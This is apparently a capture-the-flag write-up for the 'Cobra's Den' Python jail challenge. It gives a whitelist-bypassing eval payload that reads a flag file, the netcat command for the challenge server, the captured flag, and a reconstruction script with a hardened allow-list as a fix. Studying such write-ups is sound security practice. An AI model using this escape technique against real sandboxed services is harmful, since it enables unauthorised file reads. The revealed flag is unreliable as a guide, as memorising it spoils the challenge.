Cobra's Den - Python Jail Exploit

Solution
  • File: chal.py (provided as part of the challenge).

Tools/Methods Used

  • Netcat (nc): To connect to the challenge server.

  • Python Exploitation: Crafting payloads to bypass security checks.

Goals

  1. Bypass the security restrictions in the Python sandbox.

  2. Read the flag stored in the current directory.

Solution

Understanding the Code

The challenge script implements multiple layers of security to restrict input:

  • Filtered Builtins: Only allows built-ins with names ≤ 4 characters and print.

  • Whitelist Check: Restricts allowed characters and ensures commands meet specific length and format constraints.

  • Sandbox Execution: Uses eval() with strict filtered built-ins.

Crafting the Payload

  1. The security_check function restricts:

    • Character set: <ph[(cobras.den)]+~.

    • Command length: ≤ 1115.

    • Dots: ≤ 1.

  2. Using only the whitelisted characters and the short built-in names that survive the filter, the following payload was crafted:

    open(chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())))+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())))+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+~(()<()))+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())+~(()<())))).read()

  3. This payload dynamically constructs the string "flag" using arithmetic and character operations within the allowed constraints.

  4. Finally, open(...).read() opens that file and returns its contents.

Why This Payload Works:

  1. String Construction:

    • Each chr(...) evaluates to one character of the string "flag".

    • The comparison ()<() yields False; bitwise negation (~) turns it into -1, and abs, repr and ord turn that into ord('1') == 49. Adding such terms reaches every needed ASCII value (98 + 4 = 102 for 'f', 98 + 10 = 108 for 'l', 98 - 1 = 97 for 'a', 98 + 5 = 103 for 'g').

    • These operations use only characters in the allowed set.

  2. Whitelisted Characters:

    • All characters in the payload are part of <ph[(cobras.den)]+~.

    • The payload cleverly combines operations to generate necessary outputs without breaking the restrictions.

  3. File Access:

    • The string "flag" is passed to open() to access the flag file.

    • The .read() method is used to read its contents while adhering to the one-dot restriction.
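The following script is an added example, not the challenge's chal.py or the author's code: it rebuilds the jail's rules from what the writeup lists (built-in names of at most four characters plus print, the character whitelist, the 1115-character limit and the one-dot limit), regenerates the writeup's payload from the arithmetic trick described above, confirms it passes the reconstructed check, and then shows the defender-side fix: an explicit allow-list of pure built-ins, under which the same payload fails before any file is touched. The function names security_check, filtered_builtins and hardened_builtins are assumptions.

```python
"""Reconstruction of the Cobra's Den jail rules described in the writeup.

Added example, not the challenge's chal.py. The checks are rebuilt from the
rules the writeup states; names such as security_check are assumptions.
"""
import builtins

ALLOWED_CHARS = set("<ph[(cobras.den)]+~.")  # character whitelist from the writeup
MAX_LEN = 1115                                # command length limit
MAX_DOTS = 1                                  # at most one '.' per command

# The payload quoted in the writeup, for comparison with the generator below.
WRITEUP_PAYLOAD = (
    "open(chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())))"
    "+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())+~(()<())"
    "+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())))"
    "+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+~(()<()))"
    "+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())+~(()<()))))"
    ".read()"
)


def filtered_builtins():
    """Built-ins the jail exposes as the writeup describes: every name of at most
    four characters, plus print. open, chr, ord, abs and repr all qualify."""
    return {name: getattr(builtins, name)
            for name in dir(builtins)
            if len(name) <= 4 or name == "print"}


def security_check(cmd):
    """Reconstructed whitelist check (assumed shape). Returns (ok, reason)."""
    if len(cmd) > MAX_LEN:
        return False, "too long"
    if cmd.count(".") > MAX_DOTS:
        return False, "too many dots"
    bad = sorted(set(cmd) - ALLOWED_CHARS)
    if bad:
        return False, "forbidden characters: %r" % bad
    return True, "ok"


# Whitelisted building blocks the payload is made of.
FALSE = "(()<())"                     # () < ()  -> False
NEG1 = "~" + FALSE                    # ~False   -> -1
DIGIT_ONE = "ord(repr(abs(" + NEG1 + ")))"  # ord(repr(abs(-1))) -> ord('1') == 49


def char_expr(code):
    """Whitelisted expression evaluating to chr(code), built as 49 + 49 + delta
    where delta = code - 98: abs(sum of -1 terms) for positive delta, a bare
    sum of -1 terms for negative delta (this is the pattern the payload uses)."""
    delta = code - 98
    if delta > 0:
        tail = "+abs(" + "+".join([NEG1] * delta) + ")"
    elif delta < 0:
        tail = "+" + "+".join([NEG1] * -delta)
    else:
        tail = ""
    return "chr(" + DIGIT_ONE + "+" + DIGIT_ONE + tail + ")"


def string_expr(word):
    """Join one chr(...) term per character with '+', as the payload does."""
    return "+".join(char_expr(ord(c)) for c in word)


def jail_eval(expr, allowed):
    """Evaluate expr the way the writeup says the sandbox does: eval() with
    only the filtered built-ins reachable."""
    return eval(expr, {"__builtins__": allowed})


def hardened_builtins():
    """Defender-side fix (added mitigation, not part of the challenge): the
    length of a built-in's name says nothing about what it can do, so expose an
    explicit allow-list of pure functions instead of everything short."""
    pure = ("abs", "chr", "ord", "repr", "len", "min", "max", "print")
    return {name: getattr(builtins, name) for name in pure}


def demo():
    """Returns (payload passes reconstructed check, what the string part
    evaluates to, whether the hardened allow-list blocks the payload)."""
    payload = "open(" + string_expr("flag") + ").read()"
    ok, _ = security_check(payload)
    value = jail_eval(string_expr("flag"), filtered_builtins())  # 'flag'
    try:
        # The callee 'open' is looked up before any argument is evaluated, so
        # this raises NameError without opening anything.
        jail_eval(payload, hardened_builtins())
        blocked = False
    except NameError:
        blocked = True
    return ok, value, blocked


if __name__ == "__main__":
    print(demo())
```

The generator reproduces the writeup's payload byte for byte, which is a useful check that the arithmetic explanation above is complete. The hardening shown is the minimal one: a name-length filter plus a character whitelist is not a security boundary when open is four letters long, so the allow-list has to be written in terms of capability, not spelling.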

Execution Steps:

  1. Connect to the challenge server using netcat:

    nc cobras-den.chal.irisc.tf 10400
  2. Input the crafted payload.

  3. Retrieve the flag from the server’s output.

Final Answer

irisctf{pyth0n_has_s(+([]<[]))me_whacky_sh(+([]<[[]]))t}

Summary

This challenge required bypassing stringent Python sandbox restrictions. By carefully analyzing the code and exploiting allowed operations, a payload was constructed to access and read the flag file.

Remarks/Tags/Lessons Learned

  • Python Jail Escapes: This challenge exemplifies how restricted Python environments (or "Python jails") can be bypassed using creative payloads.

  • Exploiting Limited Built-ins: The restricted environment allowed only a few functions, but a deep understanding of these basics enabled the crafting of the payload.

  • Character Whitelist Challenges: The strict whitelist required creative use of allowed characters to construct complex commands.

  • Lessons Learned:

    1. Even a limited character set can be exploited for powerful results if the restrictions aren’t absolute.

    2. Bitwise operations, while simple, can provide surprising flexibility in such challenges.

    3. Sandbox security requires rigorous testing to prevent such bypasses.

  • Tags: sandbox, python jail, eval, ctf, python exploitation, security testing.
